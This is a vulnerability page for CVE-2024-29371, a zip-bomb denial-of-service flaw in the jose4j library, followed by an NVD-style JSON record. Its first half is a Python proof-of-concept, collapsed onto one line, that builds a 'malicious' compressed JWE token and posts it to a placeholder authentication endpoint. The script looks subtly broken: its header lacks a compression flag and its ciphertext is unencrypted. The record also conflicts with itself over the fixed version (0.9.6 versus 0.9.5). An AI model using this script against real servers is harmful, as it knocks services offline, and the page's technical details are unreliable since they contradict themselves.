CVE-2024-29371

import base64 import zlib # Create a high compression ratio payload (Zip Bomb) # This creates data that expands significantly when decompressed def create_zip_bomb_payload(): # Create highly compressible data pattern # This pattern compresses extremely well payload = (b'A' * 1000) * 100 # 100KB of repeated 'A' characters # Compress the payload compressed = zlib.compress(payload, level=9) # Create JWE token structure header = base64.urlsafe_b64encode(b'{"alg":"A128KW","enc":"A128GCM"}') encrypted_key = base64.urlsafe_b64encode(b'0' * 16) iv = base64.urlsafe_b64encode(b'0' * 12) ciphertext = base64.urlsafe_b64encode(compressed) auth_tag = base64.urlsafe_b64encode(b'0' * 16) # JWE Compact Serialization format jwe_token = f"{header.decode()}.{encrypted_key.decode()}.{iv.decode()}.{ciphertext.decode()}.{auth_tag.decode()}" return jwe_token # Example: Generate malicious JWE token malicious_token = create_zip_bomb_payload() print(f"Generated malicious JWE token: {malicious_token[:100]}...") print(f"Token length: {len(malicious_token)} bytes") # Send to vulnerable jose4j endpoint import requests target_url = "http://target-server/api/auth/validate" response = requests.post(target_url, data=malicious_token, headers={"Content-Type": "application/jwt"})

{"cve": {"id": "CVE-2024-29371", "sourceIdentifier": "[email protected]", "published": "2025-12-17T16:16:04.567", "lastModified": "2026-01-23T20:15:51.650", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In jose4j before 0.9.6, an attacker can cause a Denial-of-Service (DoS) condition by crafting a malicious JSON Web Encryption (JWE) token with an exceptionally high compression ratio. When this token is processed by the server, it results in significant memory allocation and processing time during decompression."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1259"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jose4j_project:jose4j:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.9.5", "matchCriteriaId": "DE62FF6D-FC62-42B0-9ED4-76A0C4419975"}]}]}], "references": [{"url": "https://bitbucket.org/b_c/jose4j/issues/220/vuln-zip-bomb-attack", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Mitigation"]}, {"url": "https://bitbucket.org/b_c/jose4j/issues/220/vuln-zip-bomb-attack", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Mitigation"]}]}}